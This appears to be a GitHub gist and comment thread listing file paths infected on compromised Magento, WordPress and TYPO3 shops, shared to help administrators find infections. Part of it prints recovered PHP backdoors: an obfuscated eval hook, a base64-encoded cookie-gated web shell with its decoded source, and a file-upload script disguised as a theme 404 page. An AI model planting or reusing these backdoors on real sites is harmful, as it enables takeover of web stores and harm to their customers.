Last active
March 23, 2021 07:21
-
-
Save ins0/13a8fbbe84166377f3f3807b6efeae20 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This is a short list with infected files from domains on the list of compromised online-shop of @gwillem. | |
**hacked-stores-in-last-48hrs.txt*** | |
https://gist.github.com/gwillem/e7c77b77d508928ad67860970c366cae | |
If you have to deal with this it maybe helps you to find infected files. | |
./html/devsys/adminerc2q.php | |
./html/devsys/media/dhl/info.php | |
./html/livesys/media/dhl/info.php | |
./html/livesys/skin/skin.php | |
./html/magento/media/dhl/info.php | |
./html/wp-includes/shortcodes.php | |
/html/wp-includes/locale.php | |
./html/wp-includes/SimplePie/Cache/Base.php | |
./html/wp-content/themes/customizr/comments.php | |
./html/wp-content/themes/virtue/woocommerce/single-product/price.php | |
./html/wp-content/themes/virtue/7567567567.php | |
./html/wp-content/themes/virtue/page-blog.php | |
./html/wp-content/themes/virtue/404.php | |
./html/wp-content/themes/catch-kathmandu/sidebar-header-top.php | |
./html/includes/.src/Mage/Archive/css.php | |
./html/includes/.src/Mage/Centinel/dump.php | |
./html/includes/.src/Mage/PaypalUk/defines.php | |
./html/includes/.src/Magpleasure/Filesystem/db.php | |
./html/includes/.src/Varien/Pear/info.php | |
./html/includes/.src/Zend/Gdata/diff.php | |
./html/includes/.src/Zend/Http/sql.php | |
./html/includes/.src/Zend/Measure/db.php | |
./html/includes/.src/Zend/Paginator/sql.php | |
./html/lib/Zend/Controller/include.php | |
./html/lib/Zend/Currency/css.php | |
./html/lib/Zend/OpenId/Extension/template.php | |
./html/skin/frontend/{customfolder}/header.php | |
./html/var/package/tmp/article.php | |
./html/{customfolder}/media/dhl/info.php | |
./html/{customfolder}/skin/omo.php | |
./html/{customfolder}/skin/skins2.php | |
./html/magento/skin/Signedint.php | |
./html/magento/skin/install/default/install.php | |
./html/magento/skin/test.php | |
./html/magento/var/package/pack.php | |
./html/piwik/tmp/cache/tracker/PluginTranslations-de-4c5c90167f7f8091f2885497b017f3d6.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms/Edit.php | |
./html/app/code/community/VladimirPopov/WebForms/Block/Webforms.php | |
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php | |
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php | |
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php | |
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms_Edit.php | |
./html/includes/src/VladimirPopov_WebForms_Block_Webforms.php | |
./html/media/dhl/info.php | |
./html/skin/error.php | |
./html/skin/ren1.php | |
./html/typo3/db2.php | |
./html/typo3/index.php | |
./html/typo3/sitemap.php | |
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx |
I will try to get the contents of these files
./html/wp-includes/SimplePie/Cache/Base.php
$qV="stop_";$s20 = strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q170405'])){eval(${$s20}['q170405']);}?><?php
// if (isset($_POST['q170405'])) {
// eval($_POST['q170405']);
// }
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
$b='ba'.'se'.(32*2).'_d'.'eco'.'de'; // base64_decode
$f='cr'.'ea'.'te_fu'.'nc'.'ti'.'on'; // create_function
$c=$b("JHBhc3MgPSAnYTYxYWZhMDdjMDMzMDBlMjAwNDhkNjQ0MTkyNWZkYjUnOw0KJGIgPSAnYicuJ2FzJy4nZTYnLic0X2QnLidlYycuJ29kZSc7DQokZnAgPSAnZmlsJy4nZV9wJy4ndXRfYycuJ29udCcuJ2VudCcuJ3MnOw0KJHNkID0gJ3NjJy4nYW5kJy4naXInOw0KJGN3ZCA9ICdnZScuJ3RjJy4nd2QnOw0KJG0gPSAnbScuJ2QnLigyKzMpOw0KDQppZiAoIWlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSkgew0KICAgIG5vdF9mb3VuZCgpOw0KfSBlbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSAmJiAkbSgkX0NPT0tJRVsnc3RvcmFnZV9sb2NhbF9wcmFnbWEnXSkgPT0gJHBhc3MpIHsNCiAgICBlY2hvICRjd2QoKTsNCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydkaXInXSkpIHsNCiAgICAgICAgcHJpbnRfcigkc2QoJF9SRVFVRVNUWydkaXInXSkpOw0KICAgIH0NCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydhbGFza2EnXSkpIHsNCiAgICAgICAgQCRmcCgkX1JFUVVFU1RbJ2FsYXNrYSddLCAkYigkX1JFUVVFU1RbJ2NvZGUnXSkpOw0KICAgIH0gICAgDQp9DQoNCmZ1bmN0aW9uIG5vdF9mb3VuZCgpDQp7DQogICAgaGVhZGVyKCdIVFRQLzEuMCA0MDQgTm90IEZvdW5kJyk7DQogICAgZGllKHByaW50KCdOb3QgRm91bmQnKSk7DQp9");
/**
$pass = 'a61afa07c03300e20048d6441925fdb5';
$b = 'b'.'as'.'e6'.'4_d'.'ec'.'ode';
$fp = 'fil'.'e_p'.'ut_c'.'ont'.'ent'.'s';
$sd = 'sc'.'and'.'ir';
$cwd = 'ge'.'tc'.'wd';
$m = 'm'.'d'.(2+3);
if (!isset($_COOKIE['storage_local_pragma'])) {
not_found();
} elseif (isset($_COOKIE['storage_local_pragma']) && $m($_COOKIE['storage_local_pragma']) == $pass) {
echo $cwd();
if (isset($_REQUEST['dir'])) {
print_r($sd($_REQUEST['dir']));
}
if (isset($_REQUEST['alaska'])) {
@$fp($_REQUEST['alaska'], $b($_REQUEST['code']));
}
}
function not_found()
{
header('HTTP/1.0 404 Not Found');
die(print('Not Found'));
}
**/
$f('', '};'.$c.'{'); // create_function('', };'.###CODE_ABOVE###.'{')
I found also a 404.php which is basically a simple file upload (like the script above) script - maybe these files where uploaded with these scripts.
/html/wp-content/themes/virtue/404.php
<?php
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>
For future reference, I have included these and many other malware samples in the Magento Malware Scanner
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Great! Would you mind to share some content, such as
./html/wp-includes/SimplePie/Cache/Base.php
or./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
?